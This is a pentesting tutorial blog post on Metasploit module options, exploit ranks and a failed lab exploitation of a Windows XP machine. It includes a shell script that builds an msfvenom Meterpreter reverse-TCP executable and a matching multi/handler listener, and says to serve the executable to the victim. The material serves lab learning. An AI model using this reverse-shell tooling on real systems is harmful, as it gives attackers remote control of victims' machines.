Tips for an Information Security Analyst/Pentester career - Ep. 34 - Metasploit: exploit options and msfvenom

In my previous post, I quickly showed what you can do with Metasploit, but now I want to show you its options in more detail.

Once we select an exploit (which exploit we pick is not important at this point), we can dig deeper into its options.



Exploit information

The first thing to do is look at what the module actually does, with show info (or simply info).

Among the information displayed, a very important item is the exploit rank.

The rank reflects how reliable the module is and how likely it is to crash the target service, not how severe the underlying vulnerability is. It goes from Manual and Low up to Excellent.

I ended up choosing a Xampp exploit, rated as excellent. For an exploit to earn that rank it has to be very low-profile: it must never crash the target service or machine, so it can never cause a denial of service. That is typically true of command-injection, SQL-injection and file-inclusion modules, and almost never of memory-corruption ones, which is why those usually sit lower in the ranking.


Targets and payloads

Once we have selected an exploit, we can also choose the target and the payload ourselves, instead of letting Metasploit pick them automatically.

In fact, if we know exactly which operating system version (and service pack or language) is running on the target machine, we can select the matching target entry, which often determines the return addresses and offsets the exploit uses, and then pick the most suitable payload for it.

To do this, while configuring the exploit options, we simply run show targets or show payloads to list the available choices, then select one with set TARGET <index> or set PAYLOAD <name>.


Exploitation

I attempted several exploits, to no avail.

I was doing that too quickly for the purposes of this tutorial, but this is a horrible pentesting approach.

That's not the way you do it.

You need to understand what each specific exploit does, how to use it, how to set up its options appropriately and how much noise you're making on the target machine.

So you need to take all the time it takes.

That's a lesson I learned.

I was overconfident; I've been playing with this stuff for years and I thought that was easy prey.

I mean, a Windows XP SP3 machine with the firewall turned off, that was a piece of cake.

I thought, "I got this".  I have exploited that before manually, so I thought it would be much easier with Metasploit.

I had to learn the hard way that you need to know each individual exploit much better, otherwise you go nowhere.

I was totally wasting my time and, had it been a real engagement, I would have totally blown it.

Humility: you never stop learning, and I should know this better than anybody else.

Anyway, like I explained in a previous post, I never give up and so I attempted another solution: build a custom payload.


Custom payload with msfvenom

Besides the exploit modules that are already built and configured for you, Metasploit ships a generic module called exploit/multi/handler. It doesn't exploit anything by itself: it just starts a listener for a stand-alone payload that you deliver and execute on the target by some other means.

We can build such a payload with msfvenom, which can output it in several formats: a Windows executable (-f exe), raw shellcode (-f raw) and many others (msfvenom --list formats shows them all).

I created an executable payload through the command shown below

I moved the executable to the Web server directory, in order to access it from the target machine through the web browser.

At this point, we need to configure multi/handler to pick up the reverse shell connection from the victim machine when the infected executable is run.

We also need to set a payload for this module, and it must be the same one we used to build our custom executable (windows/meterpreter/reverse_tcp): the stager inside the executable only knows how to talk to a handler that serves the matching stage.

Important note: the payload options set on the handler have to match the options we gave msfvenom, otherwise we won't get a shell.

In other words, LHOST and LPORT need to have the same values we baked into our msfvenom payload.

As a matter of fact, I deliberately made a mistake in the video (which I invite you to check out for more details) to show this concept. I was unable to receive the connection back from the victim machine, because I had left LPORT at its default value of 4444/TCP instead of 1234, which was the value we were supposed to set.

As soon as I corrected this mistake, I was able to pop a shell.
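The usual way to avoid exactly this mismatch is to keep LHOST and LPORT in one place and generate both the msfvenom command line and the handler's resource script from the same variables. The script below is an added example, not code from the post or from Metasploit itself: it uses the payload name and port from the post, while the attacker address 192.168.56.10, the output file name payload.exe and the RUN_MSF switch are assumptions for the example. msfvenom and msfconsole are only invoked when RUN_MSF=1, so by default it just writes handler.rc and prints the command it would run.

```shell
#!/bin/sh
# Added example, not part of the original post: generate the msfvenom payload command and the
# exploit/multi/handler resource script from ONE set of variables, and self-check them so the
# handler can never be left listening on the wrong port (the 4444-instead-of-1234 mistake).

LHOST="${LHOST:-192.168.56.10}"            # assumption: attacker's IP on the lab network
LPORT="${LPORT:-1234}"                     # the port used in the post
PAYLOAD="windows/meterpreter/reverse_tcp"  # staged payload used in the post
OUT="${OUT:-payload.exe}"                  # assumption: output file name

# Build the msfvenom command line for a Windows .exe carrying the staged reverse TCP payload.
# $1 = LHOST, $2 = LPORT, $3 = output file
msfvenom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' "$PAYLOAD" "$1" "$2" "$3"
}

# Emit an msfconsole resource script that starts the matching listener as a background job.
# ExitOnSession false keeps the handler up after the first session, for a second run of the exe.
# $1 = LHOST, $2 = LPORT
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j -z
EOF
}

# Verify that a resource script's LHOST/LPORT are the values the payload was built with.
# Returns 0 on a match, 1 on a mismatch (for example the default 4444 left in place of 1234).
# $1 = resource script, $2 = expected LHOST, $3 = expected LPORT
check_match() {
  rc_file="$1"; want_host="$2"; want_port="$3"
  got_host=$(awk 'toupper($1)=="SET" && toupper($2)=="LHOST" {print $3}' "$rc_file")
  got_port=$(awk 'toupper($1)=="SET" && toupper($2)=="LPORT" {print $3}' "$rc_file")
  [ "$got_host" = "$want_host" ] && [ "$got_port" = "$want_port" ]
}

# Generate the handler script from the same variables as the payload, then self-check it.
handler_rc "$LHOST" "$LPORT" > handler.rc
check_match handler.rc "$LHOST" "$LPORT" || {
  echo "handler.rc does not match the payload's LHOST/LPORT, refusing to continue" >&2
  exit 1
}

if [ "${RUN_MSF:-0}" = 1 ]; then
  # Real run on the attacking box: build the executable, then start the listener.
  eval "$(msfvenom_cmd "$LHOST" "$LPORT" "$OUT")"
  msfconsole -q -r handler.rc
else
  # Offline dry run: show what would be executed and where the listener script went.
  msfvenom_cmd "$LHOST" "$LPORT" "$OUT"
  echo "listener resource script written to handler.rc (set RUN_MSF=1 to build and listen)"
fi
```

Run it once with RUN_MSF=1 on the attacking machine, then copy payload.exe into the web root you serve to the victim. Because the handler script is generated rather than typed, the only way to end up with a mismatched port is to edit handler.rc by hand, and check_match catches that before msfconsole is started.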


I was also able to easily crack the passwords, as they were purposefully very weak.

Wrap-up

Like I already stated previously, Metasploit is a very powerful tool, but it can lead you to rely excessively on automated solutions.

I had to learn this concept the hard way.

Even on a very vulnerable machine, like the one I created based on Georgia Weidman's book, it doesn't always work.

I already knew this, but it's even clearer now. In my video, I only show a couple of failed attempts, but I went on that way for hours.

In a real-world pentest,  I would have completely screwed up.

So, the giveaway from all this is: don't rush it.

Do thorough reconnaissance, get your information together, get your IP addresses and your system information, make sure you understand exactly what your target systems are running, and check whether a specific vulnerability actually applies to that case before you fire an exploit at it.

In an upcoming post, I'm going to show you how you can use Metasploit to check whether a certain system is vulnerable to a specific exploit.  This can be done for some exploits only, but it's truly a time-saver, as you don't have to waste your time trying to hack the system in vain.

Hacking is a very painful road and it takes a lot of patience, resilience and determination to succeed, but more than anything it takes time.

Don't believe idiotic shows that depict the whole thing as a piece of cake, something that anybody can do.

It's a matter of mindset as much as skills, and I don't know if I have the right mindset myself.

But I know one thing for sure: that's all I want to do, so I'm not going to give up and I'll keep rolling over and over again until I get what I want.

So don't allow any setbacks from all this to stop you: you're supposed to fail, you need to and you need to do it quickly and repeatedly, and the more painfully it hurts the better.

Nothing worth achieving can be obtained without pain. If you like easy wins, this career path isn't for you.

You learn one step at a time, one failure at a time, through hours and hours banging your head against the wall until your head bleeds (gee, I'm getting too dramatic here, maybe, but you got the picture).
